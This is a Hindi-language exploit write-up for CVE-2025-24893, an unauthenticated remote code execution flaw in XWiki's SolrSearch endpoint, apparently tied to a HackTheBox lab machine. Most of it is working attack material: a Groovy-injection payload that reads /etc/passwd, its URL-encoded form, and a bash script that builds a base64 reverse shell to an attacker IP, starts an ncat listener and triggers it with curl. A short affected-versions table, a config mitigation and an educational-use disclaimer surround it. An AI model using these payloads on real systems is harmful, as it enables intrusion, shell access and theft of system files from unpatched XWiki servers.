
CVE-2025-24893 एक लोकप्रिय ओपन-सोर्स एंटरप्राइज़ विकी प्लेटफ़ॉर्म XWiki में पाई जाने वाली एक गंभीर, अप्रमाणित रिमोट कोड एग्ज़ीक्यूशन (RCE) कमज़ोरी है।
SolrSearch मैक्रो (XWiki UI)/xwiki/bin/get/Main/SolrSearch एंडपॉइंट अविश्वसनीय text= इनपुट को सीधे Freemarker टेम्पलेट में जोड़ता है।
टेम्पलेट को समय से पहले बंद करके और एक नया ब्लॉक खोलकर, एक हमलावर बिना प्रमाणीकरण के मनमाना Groovy कोड निष्पादित कर सकता है।
{{groovy}} … {{/groovy}}GET /xwiki/bin/get/Main/SolrSearch?media=rss\&text=<<<USER-DATA>>> HTTP/1.1
SolrSearch को आपूर्ति किए गए टेक्स्ट को सादे सामग्री के रूप में एम्बेड करना चाहिए, लेकिन मैक्रो हैंडलर }}}} को एस्केप करने में विफल रहता है, जिसके कारण निम्नलिखित होता है:
}}}} वर्तमान Freemarker ब्लॉक को बंद करता है। {{async async=false}}{{groovy}} … {{/groovy}}{{/async}}
async=false सिंक्रोनस निष्पादन को बाध्य करता है (अतिथियों के लिए भी काम करता है)।/etc/passwd प्रिंट करने वाला न्यूनतम PoC:
}}}{{async async=false}}{{groovy}}println("cat /etc/passwd".execute().text){{/groovy}}{{/async}}
URL-एन्कोडेड वेरिएंट (स्पेस → %20, ब्रेसेस → %7B/%7D, आदि):
%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d
| शाखा | समाधान किया गया | असुरक्षित ≤ |
|---|---|---|
| 15.x | 15.10.11 | 15.10.10 (और सभी 15.9 / 15.8 …) |
| 14.x LTS | 14.10.17 | 14.10.16 |
| 13 / 12 | अनुरक्षित नहीं – सभी असुरक्षित रहते हैं |
(स्रोत: OffSec सलाह और XWiki SEC-S 2025-02)

RHOST="editor.htb:8080"
LHOST="10.10.14.8"
LPORT=4444
# 1. one-liner reverse shell
SHELL="bash -c 'bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1'"
# 2. Base64 (single line)
B64=$(echo -n "$SHELL" | base64 -w0)
# 3. wrap in Groovy macro
RAW='}}}{{async async=false}}{{groovy}}"bash -c {echo,'$B64'}|{base64,-d}|{bash,-i}".execute(){{/groovy}}{{/async}}'
# 4. URL-encode
PAYLOAD=$(python3 -c "import urllib.parse,sys;print(urllib.parse.quote(sys.argv[1],safe=''))" "$RAW")
# start listener
sudo ncat -lvnp 4444
# trigger exploit
curl "http://$RHOST/xwiki/bin/get/Main/SolrSearch?media=rss&text=${PAYLOAD}"
xwiki_solr_rce.py exploit/ में शामिल है (नीचे कोड ब्लॉक देखें)।
python CVE-2025-24893.py -u <TARGET URL> -l <IP> -p <PORT>
जहाँ
<TARGET URL> - http:// या https:// सहित URL
(शेल के बजाय कोई मनमाना कमांड चलाने के लिए -c "id" पास करें)

# /etc/xwiki/xwiki.properties
solr.search.enabled = false
अनुसंधान और PoC: DeX1d
अस्वीकरण: केवल शैक्षिक उपयोग के लिए। इसे उन सिस्टमों के खिलाफ चलाना अवैध है जिनके आप मालिक नहीं हैं।